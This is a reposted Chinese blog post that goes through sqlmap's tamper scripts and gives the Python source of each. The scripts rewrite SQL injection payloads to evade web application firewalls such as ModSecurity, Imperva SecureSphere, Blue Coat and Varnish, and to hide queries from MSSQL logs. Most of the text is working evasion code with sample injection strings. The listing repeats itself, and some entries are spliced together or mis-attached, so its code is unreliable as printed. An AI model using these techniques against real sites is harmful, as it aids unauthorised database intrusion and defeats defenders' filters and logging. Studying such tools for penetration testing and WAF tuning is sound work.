sqlmap tamper 细读
2016-09-13 10:58
405 查看
PS:copy 大表哥的
1.apostrophemask 把’使用%EF%BC%87进行替换【类似款字节】
def tamper(payload, **kwargs):
“””
Replaces apostrophe character with its UTF-8 full width counterpart
2.apostrophenullencode 将‘使用%00%27进行替换。中间增加%00
def tamper(payload, **kwargs):
“””
Replaces apostrophe character with its illegal double unicode counterpart
3.appendnullbyte 主要表现为在每行的最后增加一个%00
def tamper(payload, **kwargs):
“””
Appends encoded NULL byte character at the end of payload
4.base64encode 主要对当前的url进行base64编码达到传递的目的(针对使用bas6e传输的)
def tamper(payload, **kwargs):
“””
Base64 all characters in a given payload
5.between 主要是替换一些使用 > = < 进行匹配的时候使用between来进行替换
def tamper(payload, **kwargs):
“””
Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’
Replaces equals operator (‘=’) with ‘BETWEEN # AND #’
6.bluecoat 针对mysql的编码,再每个空格前使用%09来达到编码的目的
def tamper(payload, **kwargs):
“””
Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator
7.chardoubleencode 对整个进行二次URL编码
def tamper(payload, **kwargs):
“””
Double url-encodes all characters in a given payload (not processing
already encoded)
8.charencode 对整个进行一次URL编码
def tamper(payload, **kwargs):
“””
Url-encodes all characters in a given payload (not processing already
encoded)
9.charunicodeencode 对整个进行Unicode编码(也就是S转换为%u0053)【主要体现在asp asp.net上】
def tamper(payload, **kwargs):
“””
Unicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)
10.concat2concatws 主要是作用于把CONCAT(A, B)替换为CONCAT_WS(MID(CHAR(0), 0, 0), A, B)
def tamper(payload, **kwargs):
“””
Replaces instances like ‘CONCAT(A, B)’ with ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’
11.equaltolike 把等于使用like进行替换
def tamper(payload, **kwargs):
“””
Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
12.greatest 主要的作用是把A>B使用GREATEST(A,B+1)=A进行替换
def tamper(payload, **kwargs):
“””
Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart
13.halfversionedmorekeywords 使用/*!0替换空格
def tamper(payload, **kwargs):
“””
Adds versioned MySQL comment before each keyword
14.lowercase 主要是把大写转换为小写
def tamper(payload, **kwargs):
“””
Replaces each keyword character with lower case value
15.modsecurityversioned 在两个变量之间加上 /!30%/” 类似于1 AND 2>1– 转为 1 /!30874AND 2>1/–
def tamper(payload, **kwargs):
“””
Embraces complete query with versioned comment
16.modsecurityzeroversioned 在两个变量之间加上 /!00000 类似于1 AND 2>1– 转为 1 /!00000AND 2>1*/–
def tamper(payload, **kwargs):
“””
Embraces complete query with zero-versioned comment
17.multiplespaces 增加空格的个数。类似把一个空格使用4个空格(或者TAB)替换
def tamper(payload, **kwargs):
“””
Adds multiple spaces around SQL keywords
18.nonrecursivereplacement 主要是在(“UNION”, “SELECT”, “INSERT”, “UPDATE”, “FROM”, “WHERE”)中间继续填充一个关键词。
把UNION SELECT转换为UNIOUNIONN SELESELECTCT
def tamper(payload, **kwargs):
“””
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filters
19.overlongutf8 主要为使用%C0%AA替换空格
def tamper(payload, **kwargs):
“””
Converts all characters in a given payload (not processing already
encoded)
20.percentage 主要是使用%分割关键词类似于把SELECT 转换为%S%E%L%E%C%T
def tamper(payload, **kwargs):
“””
Adds a percentage sign (‘%’) infront of each character
def tamper(payload, **kwargs):
“””
Replaces each keyword character with random case value
21.randomcase 随机转换大小写。类似于INSERT转换为INseRt
def tamper(payload, **kwargs):
“””
Replaces each keyword character with random case value
22.randomcomments 随机在关键词间插入//.类似INSERT转换为I//N/**/SERT
def tamper(payload, **kwargs):
“””
Add random comments to SQL keywords
23.securesphere 再末尾增加and ‘0having’=’0having
def tamper(payload, **kwargs):
“””
Appends special crafted string
24.sp_password 针对MSSQL的一种办法。在–后面增加sp_password
def tamper(payload, **kwargs):
“””
Appends ‘sp_password’ to the end of the payload for automatic obfuscation from DBMS logs
25.space2comment 使用/**/替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with comments ‘/**/’
26.space2dash 使用–(rand)%0A替换掉空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a dash comment (‘–’) followed by
a random string and a new line (‘\n’)
27.space2hash 使用%23(rand)%0A来替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a pound character (‘#’) followed by
a random string and a new line (‘\n’)
28.space2morehash 使用多个%23(rand)%0A来替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a pound character (‘#’) followed by
a random string and a new line (‘\n’)
29.space2mssqlblank 针对MSSQL使用特定的字符替换空格
特定的字符(‘%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a random blank character from a
valid set of alternate characters
30.space2mssqlhash 使用%23%0A来替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a pound character (‘#’) followed by
a new line (‘\n’)
31.space2mysqlblank 针对MYSQL使用特定的字符来替换空格
特定的字符(‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’)
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a random blank character from a
valid set of alternate characters
32.space2mysqldash 针对MYSQL使用–%0A来替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a dash comment (‘–’) followed by
a new line (‘\n’)
33.space2plus 主要用于使用+替换空格符
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with plus (‘+’)
Notes:
* Is this any useful? The plus get’s url-encoded by sqlmap engine
invalidating the query afterwards
* This tamper script works against all databases
tamper(‘SELECT id FROM users’)
‘SELECT+id+FROM+users’
“””
retVal = payload
if payload:
retVal = “”
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += “+”
continue
elif payload[i] == ‘\”:
quote = not quote
elif payload[i] == ‘”’:
doublequote = not doublequote
elif payload[i] == ” ” and not doublequote and not quote:
retVal += “+”
continue
retVal += payload[i]
return retVal
34.space2randomblank主要用”%09”, “%0A”, “%0C”, “%0D”替换注入中的空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a random blank character from a
valid set of alternate characters
Tested against:
* Microsoft SQL Server 2005
* MySQL 4, 5.0 and 5.5
* Oracle 10g
* PostgreSQL 8.3, 8.4, 9.0
Notes:
* Useful to bypass several web application firewalls
random.seed(0)
tamper(‘SELECT id FROM users’)
‘SELECT%0Did%0DFROM%0Ausers’
“””
# ASCII table:
# TAB 09 horizontal TAB
# LF 0A new line
# FF 0C new page
# CR 0D carriage return
blanks = (“%09”, “%0A”, “%0C”, “%0D”)
retVal = payload
if payload:
retVal = “”
quote, doublequote, firstspace = False, False, False
for i in xrange(len(payload)):
if not firstspace:
if payload[i].isspace():
firstspace = True
retVal += random.choice(blanks)
continue
elif payload[i] == ‘\”:
quote = not quote
elif payload[i] == ‘”’:
doublequote = not doublequote
elif payload[i] == ’ ’ and not doublequote and not quote:
retVal += random.choice(blanks)
continue
retVal += payload[i]
return retVal
35.symboliclogical 该插件主要是在and被过来后使用&& 以及||
def tamper(payload, **kwargs):
“””
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
tamper(“1 AND ‘1’=’1”)
“1 %26%26 ‘1’=’1”
“”“
36.unionalltounion 该插件主要是替换掉union all select 里面的all
def tamper(payload, **kwargs):
“””
Replaces UNION ALL SELECT with UNION SELECT
tamper(‘-1 UNION ALL SELECT’)
‘-1 UNION SELECT’
“”“
37.unmagicquotes 主要用在宽字节注入,绕过magic_quotes/addslashes
def tamper(payload, **kwargs):
“””
Replaces quote character (‘) with a multi-byte combo %bf%27 together with
generic comment at the end (to make it work)
Notes:
* Useful for bypassing magic_quotes/addslashes feature
Reference:
* http://shiflett.org/blog/2006/jan/addslashes-versus-mysql-real-escape-string
tamper(“1’ AND 1=1”)
‘1%bf%27– ’
“”“
38.varnish 主要是用于X-originating-IP可以绕过部分认证
def tamper(payload, **kwargs):
“””
Append a HTTP header ‘X-originating-IP’ to bypass
WAF Protection of Varnish Firewall
Notes:
Reference: http://h30499.www3.hp.com/t5/Fortify-Application-Security/Bypassing-web-application-firewalls-using-HTTP-headers/ba-p/6418366
Examples:
X-forwarded-for: TARGET_CACHESERVER_IP (184.189.250.X)
X-remote-IP: TARGET_PROXY_IP (184.189.250.X)
X-originating-IP: TARGET_LOCAL_IP (127.0.0.1)
x-remote-addr: TARGET_INTERNALUSER_IP (192.168.1.X)
X-remote-IP: * or %00 or %0A
“”“
39.versionedmorekeywords 该插件主要是在mysql敏感词两旁加/!%s/
tamper(‘1 UNION ALL SELECT NULL, NULL, CONCAT(CHAR(58,122,114,115,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,115,114,121,58))#’)
‘1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/,/!CONCAT/(/!CHAR/(58,122,114,115,58),/!IFNULL/(CAST(/!CURRENT_USER/()/!AS//!CHAR/),/!CHAR/(32)),/!CHAR/(58,115,114,121,58))#’
“”“
40.xforwardedfor.py 该插件主要用于随机xforwardedfor
def randomIP():
numbers = []
while not numbers or numbers[0] in (10, 172, 192):
numbers = sample(xrange(1, 255), 4)
return ‘.’.join(str() for in numbers)
def tamper(payload, **kwargs):
“””
Append a fake HTTP header ‘X-Forwarded-For’ to bypass
WAF (usually application based) protection
“”“
1.apostrophemask 把’使用%EF%BC%87进行替换【类似款字节】
def tamper(payload, **kwargs):
“””
Replaces apostrophe character with its UTF-8 full width counterpart
References: * http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128 * http://lukasz.pilorz.net/testy/unicode_conversion/ * http://sla.ckers.org/forum/read.php?13,11562,11850 * http://lukasz.pilorz.net/testy/full_width_utf/index.phps >>> tamper("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' """ return payload.replace('\'', "%EF%BC%87") if payload else payload
2.apostrophenullencode 将‘使用%00%27进行替换。中间增加%00
def tamper(payload, **kwargs):
“””
Replaces apostrophe character with its illegal double unicode counterpart
>>> tamper("1 AND '1'='1") '1 AND %00%271%00%27=%00%271' """ return payload.replace('\'', "%00%27") if payload else payload
3.appendnullbyte 主要表现为在每行的最后增加一个%00
def tamper(payload, **kwargs):
“””
Appends encoded NULL byte character at the end of payload
Requirement: * Microsoft Access Notes: * Useful to bypass weak web application firewalls when the back-end database management system is Microsoft Access - further uses are also possible Reference: http://projects.webappsec.org/w/page/13246949/Null-Byte-Injection >>> tamper('1 AND 1=1') '1 AND 1=1%00' """ return "%s%%00" % payload if payload else payload
4.base64encode 主要对当前的url进行base64编码达到传递的目的(针对使用bas6e传输的)
def tamper(payload, **kwargs):
“””
Base64 all characters in a given payload
>>> tamper("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' """
5.between 主要是替换一些使用 > = < 进行匹配的时候使用between来进行替换
def tamper(payload, **kwargs):
“””
Replaces greater than operator (‘>’) with ‘NOT BETWEEN 0 AND #’
Replaces equals operator (‘=’) with ‘BETWEEN # AND #’
Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The BETWEEN clause is SQL standard. Hence, this tamper script should work against all (?) databases >>> tamper('1 AND A > B--') '1 AND A NOT BETWEEN 0 AND B--' >>> tamper('1 AND A = B--') '1 AND A BETWEEN B AND B--' """ retVal = payload if payload: match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>]+)\s*\Z", payload) if match: _ = "%s %s NOT BETWEEN 0 AND %s" % (match.group(2), match.group(4), match.group(5)) retVal = retVal.replace(match.group(0), _) else: retVal = re.sub(r"\s*>\s*(\d+|'[^']+'|\w+\(\d+\))", " NOT BETWEEN 0 AND \g<1>", payload) if retVal == payload: match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^=]+?)\s*=\s*(\w+)\s*", payload) if match: _ = "%s %s BETWEEN %s AND %s" % (match.group(2), match.group(4), match.group(5), match.group(5)) retVal = retVal.replace(match.group(0), _) return retVal return base64.b64encode(payload.encode(UNICODE_ENCODING)) if payload else payload
6.bluecoat 针对mysql的编码,再每个空格前使用%09来达到编码的目的
def tamper(payload, **kwargs):
“””
Replaces space character after SQL statement with a valid random blank character.
Afterwards replace character = with LIKE operator
Requirement: * Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147 Tested against: * MySQL 5.1, SGOS Notes: * Useful to bypass Blue Coat's recommended WAF rule configuration >>> tamper('SELECT id FROM users WHERE id = 1') 'SELECT%09id FROM%09users WHERE%09id LIKE 1' """ def process(match): word = match.group('word') if word.upper() in kb.keywords: return match.group().replace(word, "%s%%09" % word) else: return match.group() retVal = payload if payload: retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", lambda match: process(match), retVal) retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) retVal = retVal.replace("%09 ", "%09") return retVal
7.chardoubleencode 对整个进行二次URL编码
def tamper(payload, **kwargs):
“””
Double url-encodes all characters in a given payload (not processing
already encoded)
Notes: * Useful to bypass some weak web application firewalls that do not double url-decode the request before processing it through their ruleset >>> tamper('SELECT FIELD FROM%20TABLE') '%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545' """ retVal = payload if payload: retVal = "" i = 0 while i < len(payload): if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += '%%25%s' % payload[i + 1:i + 3] i += 3 else: retVal += '%%25%.2X' % ord(payload[i]) i += 1 return retVal
8.charencode 对整个进行一次URL编码
def tamper(payload, **kwargs):
“””
Url-encodes all characters in a given payload (not processing already
encoded)
Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak web application firewalls that do not url-decode the request before processing it through their ruleset * The web server will anyway pass the url-decoded version behind, hence it should work against any DBMS >>> tamper('SELECT FIELD FROM%20TABLE') '%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45' """ retVal = payload if payload: retVal = "" i = 0 while i < len(payload): if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 else: retVal += '%%%.2X' % ord(payload[i]) i += 1 return retVal
9.charunicodeencode 对整个进行Unicode编码(也就是S转换为%u0053)【主要体现在asp asp.net上】
def tamper(payload, **kwargs):
“””
Unicode-url-encodes non-encoded characters in a given payload (not
processing already encoded)
Requirement: * ASP * ASP.NET Tested against: * Microsoft SQL Server 2000 * Microsoft SQL Server 2005 * MySQL 5.1.56 * PostgreSQL 9.0.3 Notes: * Useful to bypass weak web application firewalls that do not unicode url-decode the request before processing it through their ruleset >>> tamper('SELECT FIELD%20FROM TABLE') '%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045' """ retVal = payload if payload: retVal = "" i = 0 while i < len(payload): if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += "%%u00%s" % payload[i + 1:i + 3] i += 3 else: retVal += '%%u%.4X' % ord(payload[i]) i += 1 return retVal
10.concat2concatws 主要是作用于把CONCAT(A, B)替换为CONCAT_WS(MID(CHAR(0), 0, 0), A, B)
def tamper(payload, **kwargs):
“””
Replaces instances like ‘CONCAT(A, B)’ with ‘CONCAT_WS(MID(CHAR(0), 0, 0), A, B)’
Requirement: * MySQL Tested against: * MySQL 5.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that filter the CONCAT() function >>> tamper('CONCAT(1,2)') 'CONCAT_WS(MID(CHAR(0),0,0),1,2)' """ if payload: payload = payload.replace("CONCAT(", "CONCAT_WS(MID(CHAR(0),0,0),") return payload
11.equaltolike 把等于使用like进行替换
def tamper(payload, **kwargs):
“””
Replaces all occurances of operator equal (‘=’) with operator ‘LIKE’
Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the equal character ('=') * The LIKE operator is SQL standard. Hence, this tamper script should work against all (?) databases >>> tamper('SELECT * FROM users WHERE id=1') 'SELECT * FROM users WHERE id LIKE 1' """ retVal = payload if payload: retVal = re.sub(r"\s*=\s*", " LIKE ", retVal) return retVal
12.greatest 主要的作用是把A>B使用GREATEST(A,B+1)=A进行替换
def tamper(payload, **kwargs):
“””
Replaces greater than operator (‘>’) with ‘GREATEST’ counterpart
Tested against: * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls that filter the greater than character * The GREATEST clause is a widespread SQL command. Hence, this tamper script should work against majority of databases >>> tamper('1 AND A > B') '1 AND GREATEST(A,B+1)=A' """ retVal = payload if payload: match = re.search(r"(?i)(\b(AND|OR)\b\s+)(?!.*\b(AND|OR)\b)([^>]+?)\s*>\s*([^>#-]+)", payload) if match: _ = "%sGREATEST(%s,%s+1)=%s" % (match.group(1), match.group(4), match.group(5), match.group(4)) retVal = retVal.replace(match.group(0), _) return retVal
13.halfversionedmorekeywords 使用/*!0替换空格
def tamper(payload, **kwargs):
“””
Adds versioned MySQL comment before each keyword
Requirement: * MySQL < 5.1 Tested against: * MySQL 4.0.18, 5.0.22 Notes: * Useful to bypass several web application firewalls when the back-end database management system is MySQL * Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html >>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa") "value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa" """ def process(match): word = match.group('word') if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS: return match.group().replace(word, "/*!0%s" % word) else: return match.group() retVal = payload if payload: retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal) retVal = retVal.replace(" /*!0", "/*!0") return retVal
14.lowercase 主要是把大写转换为小写
def tamper(payload, **kwargs):
“””
Replaces each keyword character with lower case value
Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases >>> tamper('INSERT') 'insert' """ retVal = payload if payload: for match in re.finditer(r"[A-Za-z_]+", retVal): word = match.group() if word.upper() in kb.keywords: retVal = retVal.replace(word, word.lower()) return retVal
15.modsecurityversioned 在两个变量之间加上 /!30%/” 类似于1 AND 2>1– 转为 1 /!30874AND 2>1/–
def tamper(payload, **kwargs):
“””
Embraces complete query with versioned comment
Requirement: * MySQL Tested against: * MySQL 5.0 Notes: * Useful to bypass ModSecurity WAF/IDS >>> import random >>> random.seed(0) >>> tamper('1 AND 2>1--') '1 /*!30874AND 2>1*/--' """ retVal = payload if payload: postfix = '' for comment in ('#', '--', '/*'): if comment in payload: postfix = payload[payload.find(comment):] payload = payload[:payload.find(comment)] break if ' ' in payload: retVal = "%s /*!30%s%s*/%s" % (payload[:payload.find(' ')], randomInt(3), payload[payload.find(' ') + 1:], postfix) return retVal
16.modsecurityzeroversioned 在两个变量之间加上 /!00000 类似于1 AND 2>1– 转为 1 /!00000AND 2>1*/–
def tamper(payload, **kwargs):
“””
Embraces complete query with zero-versioned comment
Requirement: * MySQL Tested against: * MySQL 5.0 Notes: * Useful to bypass ModSecurity WAF/IDS >>> tamper('1 AND 2>1--') '1 /*!00000AND 2>1*/--' """ retVal = payload if payload: postfix = '' for comment in ('#', '--', '/*'): if comment in payload: postfix = payload[payload.find(comment):] payload = payload[:payload.find(comment)] break if ' ' in payload: retVal = "%s /*!00000%s*/%s" % (payload[:payload.find(' ')], payload[payload.find(' ') + 1:], postfix) return retVal
17.multiplespaces 增加空格的个数。类似把一个空格使用4个空格(或者TAB)替换
def tamper(payload, **kwargs):
“””
Adds multiple spaces around SQL keywords
Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions Reference: https://www.owasp.org/images/7/74/Advanced_SQL_Injection.ppt >>> random.seed(0) >>> tamper('1 UNION SELECT foobar') '1 UNION SELECT foobar' """ retVal = payload if payload: words = set() for match in re.finditer(r"[A-Za-z_]+", payload): word = match.group() if word.upper() in kb.keywords: words.add(word) for word in words: retVal = re.sub("(?<=\W)%s(?=[^A-Za-z_(]|\Z)" % word, "%s%s%s" % (' ' * random.randrange(1, 4), word, ' ' * random.randrange(1, 4)), retVal) retVal = re.sub("(?<=\W)%s(?=[(])" % word, "%s%s" % (' ' * random.randrange(1, 4), word), retVal) return retVal
18.nonrecursivereplacement 主要是在(“UNION”, “SELECT”, “INSERT”, “UPDATE”, “FROM”, “WHERE”)中间继续填充一个关键词。
把UNION SELECT转换为UNIOUNIONN SELESELECTCT
def tamper(payload, **kwargs):
“””
Replaces predefined SQL keywords with representations
suitable for replacement (e.g. .replace(“SELECT”, “”)) filters
Notes: * Useful to bypass very weak custom filters >>> random.seed(0) >>> tamper('1 UNION SELECT 2--') '1 UNIOUNIONN SELESELECTCT 2--' """ keywords = ("UNION", "SELECT", "INSERT", "UPDATE", "FROM", "WHERE") retVal = payload warnMsg = "currently only couple of keywords are being processed %s. " % str(keywords) warnMsg += "You can set it manually according to your needs" singleTimeWarnMessage(warnMsg) if payload: for keyword in keywords: _ = random.randint(1, len(keyword) - 1) retVal = re.sub(r"(?i)\b%s\b" % keyword, "%s%s%s" % (keyword[:_], keyword, keyword[_:]), retVal) return retVal
19.overlongutf8 主要为使用%C0%AA替换空格
def tamper(payload, **kwargs):
“””
Converts all characters in a given payload (not processing already
encoded)
Reference: https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/ >>> tamper('SELECT FIELD FROM TABLE WHERE 2>1') 'SELECT FIELD%C0%AAFROM%C0%AATABLE%C0%AAWHERE%C0%AA2%C0%BE1' """ retVal = payload if payload: retVal = "" i = 0 while i < len(payload): if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 else: if payload[i] not in (string.ascii_letters + string.digits): retVal += "%%C0%%%.2X" % (0x8A | ord(payload[i])) else: retVal += payload[i] i += 1 return retVal
20.percentage 主要是使用%分割关键词类似于把SELECT 转换为%S%E%L%E%C%T
def tamper(payload, **kwargs):
“””
Adds a percentage sign (‘%’) infront of each character
Requirement: * ASP Tested against: * Microsoft SQL Server 2000, 2005 * MySQL 5.1.56, 5.5.11 * PostgreSQL 9.0 Notes:
def tamper(payload, **kwargs):
“””
Replaces each keyword character with random case value
Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases >>> import random >>> random.seed(0) >>> tamper('INSERT') 'INseRt' """ retVal = payload if payload: for match in re.finditer(r"[A-Za-z_]+", retVal): word = match.group() if word.upper() in kb.keywords: while True: _ = "" for i in xrange(len(word)): _ += word[i].upper() if randomRange(0, 1) else word[i].lower() if len(_) > 1 and _ not in (_.lower(), _.upper()): break retVal = retVal.replace(word, _) return retVal * Useful to bypass weak and bespoke web application firewalls >>> tamper('SELECT FIELD FROM TABLE') '%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E' """ if payload: retVal = "" i = 0 while i < len(payload): if payload[i] == '%' and (i < len(payload) - 2) and payload[i + 1:i + 2] in string.hexdigits and payload[i + 2:i + 3] in string.hexdigits: retVal += payload[i:i + 3] i += 3 elif payload[i] != ' ': retVal += '%%%s' % payload[i] i += 1 else: retVal += payload[i] i += 1 return retVal
21.randomcase 随机转换大小写。类似于INSERT转换为INseRt
def tamper(payload, **kwargs):
“””
Replaces each keyword character with random case value
Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass very weak and bespoke web application firewalls that has poorly written permissive regular expressions * This tamper script should work against all (?) databases >>> import random >>> random.seed(0) >>> tamper('INSERT') 'INseRt' """ retVal = payload if payload: for match in re.finditer(r"[A-Za-z_]+", retVal): word = match.group() if word.upper() in kb.keywords: while True: _ = "" for i in xrange(len(word)): _ += word[i].upper() if randomRange(0, 1) else word[i].lower() if len(_) > 1 and _ not in (_.lower(), _.upper()): break retVal = retVal.replace(word, _) return retVal
22.randomcomments 随机在关键词间插入//.类似INSERT转换为I//N/**/SERT
def tamper(payload, **kwargs):
“””
Add random comments to SQL keywords
>>> import random >>> random.seed(0) >>> tamper('INSERT') 'I/**/N/**/SERT' """ retVal = payload if payload: for match in re.finditer(r"\b[A-Za-z_]+\b", payload): word = match.group() if len(word) < 2: continue if word.upper() in kb.keywords: _ = word[0] for i in xrange(1, len(word) - 1): _ += "%s%s" % ("/**/" if randomRange(0, 1) else "", word[i]) _ += word[-1] if "/**/" not in _: index = randomRange(1, len(word) - 1) _ = word[:index] + "/**/" + word[index:] retVal = retVal.replace(word, _) return retVal
23.securesphere 再末尾增加and ‘0having’=’0having
def tamper(payload, **kwargs):
“””
Appends special crafted string
Notes: * Useful for bypassing Imperva SecureSphere WAF * Reference: http://seclists.org/fulldisclosure/2011/May/163 >>> tamper('1 AND 1=1') "1 AND 1=1 and '0having'='0having'" """ return payload + " and '0having'='0having'" if payload else payload
24.sp_password 针对MSSQL的一种办法。在–后面增加sp_password
def tamper(payload, **kwargs):
“””
Appends ‘sp_password’ to the end of the payload for automatic obfuscation from DBMS logs
Requirement: * MSSQL Notes: * Appending sp_password to the end of the query will hide it from T-SQL logs as a security measure * Reference: http://websec.ca/kb/sql_injection >>> tamper('1 AND 9227=9227-- ') '1 AND 9227=9227-- sp_password' """ retVal = "" if payload: retVal = "%s%ssp_password" % (payload, "-- " if not any(_ if _ in payload else None for _ in ('#', "-- ")) else "") return retVal
25.space2comment 使用/**/替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with comments ‘/**/’
Tested against: * Microsoft SQL Server 2005 * MySQL 4, 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3, 8.4, 9.0 Notes: * Useful to bypass weak and bespoke web application firewalls >>> tamper('SELECT id FROM users') 'SELECT/**/id/**/FROM/**/users' """ retVal = payload if payload: retVal = "" quote, doublequote, firstspace = False, False, False for i in xrange(len(payload)): if not firstspace: if payload[i].isspace(): firstspace = True retVal += "/**/" continue elif payload[i] == '\'': quote = not quote elif payload[i] == '"': doublequote = not doublequote elif payload[i] == " " and not doublequote and not quote: retVal += "/**/" continue retVal += payload[i] return retVal
26.space2dash 使用–(rand)%0A替换掉空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a dash comment (‘–’) followed by
a random string and a new line (‘\n’)
Requirement: * MSSQL * SQLite Notes: * Useful to bypass several web application firewalls * Used during the ZeroNights SQL injection challenge, https://proton.onsec.ru/contest/ >>> random.seed(0) >>> tamper('1 AND 9227=9227') '1--nVNaVoPYeva%0AAND--ngNvzqu%0A9227=9227' """ retVal = "" if payload: for i in xrange(len(payload)): if payload[i].isspace(): randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "--%s%%0A" % randomStr elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] break else: retVal += payload[i] return retVal
27.space2hash 使用%23(rand)%0A来替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a pound character (‘#’) followed by
a random string and a new line (‘\n’)
Requirement: * MySQL Tested against: * MySQL 4.0, 5.0 Notes: * Useful to bypass several web application firewalls * Used during the ModSecurity SQL injection challenge, http://modsecurity.org/demo/challenge.html >>> random.seed(0) >>> tamper('1 AND 9227=9227') '1%23nVNaVoPYeva%0AAND%23ngNvzqu%0A9227=9227' """ retVal = "" if payload: for i in xrange(len(payload)): if payload[i].isspace(): randomStr = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase) for _ in xrange(random.randint(6, 12))) retVal += "%%23%s%%0A" % randomStr elif payload[i] == '#' or payload[i:i + 3] == '-- ': retVal += payload[i:] break else: retVal += payload[i] return retVal
28.space2morehash 使用多个%23(rand)%0A来替换空格
def tamper(payload, **kwargs):
“””
Replaces space character (’ ‘) with a pound character (‘#’) followed by
a random string and a new line (‘\n’)
